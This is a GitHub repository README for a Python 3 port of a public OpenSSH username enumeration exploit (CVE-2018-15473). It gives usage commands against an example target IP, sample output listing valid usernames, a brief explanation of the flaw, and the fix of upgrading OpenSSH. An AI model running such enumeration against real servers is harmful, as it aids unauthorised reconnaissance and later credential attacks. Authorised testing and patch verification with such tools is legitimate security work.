Skip to content

0xrobiul/CVE-2018-15473

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2018-15473

SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)

Edited version of the original exploit: https://www.exploit-db.com/exploits/45233

  • Converted to Python3

  • Added username wordlist option

How To Run

#Install the requirements:

foo@bar:~$ pip3 install -r requirements.txt
#For single username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -u root

[+] root is a valid username
#For multiple username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt

[+] root is a valid username

[-] mysql is an invalid username

[-] mike is an invalid username

[-] foo is an invalid username

[-] bar is an invalid username

Valid Users: 

root
#For more option:

foo@bar:~$ ./Exploit.py -h

About the Vulnerability:

The system responds differently to valid and invalid authentication attempts. A remote user can send specially crafted requests to determine valid usernames on the target system. Thus, a remote user can determine valid usernames on the target system.

Solution:

OpenSSH server should be upgraded to, or higher than, version 7.7

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages